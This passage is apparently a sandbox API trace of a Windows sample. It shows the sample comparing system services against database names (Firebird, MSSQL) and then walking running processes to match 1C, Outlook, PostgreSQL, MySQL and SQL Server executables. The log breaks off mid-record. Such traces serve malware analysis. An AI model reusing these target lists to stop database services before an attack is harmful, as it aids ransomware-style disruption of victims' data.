[0050.167] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0050.167] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0050.167] lstrlenW (lpString="LanmanServer") returned 12 [0050.167] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0050.167] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0050.167] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0050.167] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0050.167] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0050.167] lstrlenW (lpString="LanmanWorkstation") returned 17 [0050.167] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.167] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.167] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0050.167] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0050.167] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0050.167] lstrlenW (lpString="lmhosts") returned 7 [0050.167] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0050.167] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0050.167] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0050.167] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0050.167] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0050.167] lstrlenW (lpString="MMCSS") returned 5 [0050.167] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0050.167] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0050.168] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0050.168] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0050.168] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0050.168] lstrlenW (lpString="MpsSvc") returned 6 [0050.168] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0050.168] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0050.168] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0050.168] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0050.168] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0050.168] lstrlenW (lpString="Netman") returned 6 [0050.168] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0050.168] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0050.168] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0050.168] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0050.168] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0050.168] lstrlenW (lpString="netprofm") returned 8 [0050.168] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0050.168] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0050.168] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0050.168] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0050.168] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0050.168] lstrlenW (lpString="NlaSvc") returned 6 [0050.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0050.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0050.169] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0050.169] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0050.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0050.169] lstrlenW (lpString="nsi") returned 3 [0050.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0050.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0050.169] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0050.169] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0050.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0050.169] lstrlenW (lpString="PcaSvc") returned 6 [0050.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0050.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0050.169] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0050.169] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0050.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0050.169] lstrlenW (lpString="PlugPlay") returned 8 [0050.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0050.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0050.169] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0050.169] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0050.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0050.169] lstrlenW (lpString="Power") returned 5 [0050.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0050.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0050.169] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0050.169] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0050.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0050.169] lstrlenW (lpString="ProfSvc") returned 7 [0050.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0050.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0050.170] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0050.170] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0050.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0050.170] lstrlenW (lpString="RpcEptMapper") returned 12 [0050.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.170] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0050.170] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0050.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0050.170] lstrlenW (lpString="RpcSs") returned 5 [0050.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0050.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0050.170] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0050.170] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0050.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0050.170] lstrlenW (lpString="SamSs") returned 5 [0050.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0050.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0050.170] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0050.170] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0050.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0050.170] lstrlenW (lpString="Schedule") returned 8 [0050.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0050.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0050.170] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0050.170] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0050.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0050.170] lstrlenW (lpString="SENS") returned 4 [0050.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0050.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0050.170] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0050.170] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0050.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0050.170] lstrlenW (lpString="ShellHWDetection") returned 16 [0050.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.170] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0050.170] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0050.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0050.171] lstrlenW (lpString="Spooler") returned 7 [0050.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0050.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0050.171] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0050.171] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0050.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0050.171] lstrlenW (lpString="swprv") returned 5 [0050.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0050.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0050.171] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0050.171] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0050.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0050.171] lstrlenW (lpString="SysMain") returned 7 [0050.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0050.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0050.171] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0050.171] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0050.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0050.171] lstrlenW (lpString="Themes") returned 6 [0050.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0050.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0050.172] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0050.172] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0050.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0050.172] lstrlenW (lpString="TrkWks") returned 6 [0050.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0050.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0050.172] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0050.173] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0050.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0050.173] lstrlenW (lpString="UxSms") returned 5 [0050.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0050.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0050.177] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0050.177] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0050.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0050.177] lstrlenW (lpString="VSS") returned 3 [0050.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0050.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0050.177] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0050.177] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0050.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0050.177] lstrlenW (lpString="WdiServiceHost") returned 14 [0050.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.177] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0050.177] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0050.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0050.177] lstrlenW (lpString="WdiSystemHost") returned 13 [0050.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.177] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0050.177] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0050.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0050.178] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0050.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.178] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0050.178] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0050.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0050.178] lstrlenW (lpString="Winmgmt") returned 7 [0050.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0050.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0050.178] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0050.178] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0050.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0050.178] lstrlenW (lpString="WPDBusEnum") returned 10 [0050.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.178] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0050.178] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0050.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0050.178] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3940ef0 | out: hHeap=0x600000) returned 1 [0050.178] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21c [0050.180] Process32FirstW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0050.181] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0050.181] lstrlenW (lpString="System") returned 6 [0050.181] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0050.182] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0050.182] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0050.182] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0050.182] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0050.182] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0050.182] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0050.182] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0050.182] lstrlenW (lpString="smss.exe") returned 8 [0050.182] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0050.182] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0050.183] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0050.183] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0050.183] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0050.183] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0050.183] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0050.183] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.183] lstrlenW (lpString="csrss.exe") returned 9 [0050.183] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0050.183] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0050.183] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0050.183] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0050.183] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0050.183] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0050.183] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0050.183] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0050.184] lstrlenW (lpString="wininit.exe") returned 11 [0050.184] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0050.184] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0050.184] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0050.184] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.187] lstrlenW (lpString="csrss.exe") returned 9 [0050.189] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0050.216] lstrlenW (lpString="winlogon.exe") returned 12 [0050.217] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0050.217] lstrlenW (lpString="services.exe") returned 12 [0050.217] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0050.218] lstrlenW (lpString="lsass.exe") returned 9 [0050.218] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0050.219] lstrlenW (lpString="lsm.exe") returned 7 [0050.219] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.219] lstrlenW (lpString="svchost.exe") returned 11 [0050.219] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.220] lstrlenW (lpString="svchost.exe") returned 11 [0050.220] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.223] lstrlenW (lpString="svchost.exe") returned 11 [0050.223] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.223] lstrlenW (lpString="svchost.exe") returned 11 [0050.223] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.224] lstrlenW (lpString="svchost.exe") returned 11 [0050.224] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0050.225] lstrlenW (lpString="audiodg.exe") returned 11 [0050.225] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.225] lstrlenW (lpString="svchost.exe") returned 11 [0050.225] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.226] lstrlenW (lpString="svchost.exe") returned 11 [0050.226] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0050.226] lstrlenW (lpString="dwm.exe") returned 7 [0050.226] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0050.227] lstrlenW (lpString="explorer.exe") returned 12 [0050.227] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0050.228] lstrlenW (lpString="spoolsv.exe") returned 11 [0050.228] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0050.228] lstrlenW (lpString="taskhost.exe") returned 12 [0050.228] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.229] lstrlenW (lpString="svchost.exe") returned 11 [0050.229] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0050.230] lstrlenW (lpString="taskeng.exe") returned 11 [0050.230] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0050.230] lstrlenW (lpString="taskhost.exe") returned 12 [0050.230] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0050.231] lstrlenW (lpString="challenging.exe") returned 15 [0050.231] Process32NextW (in: hSnapshot=0x21c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, 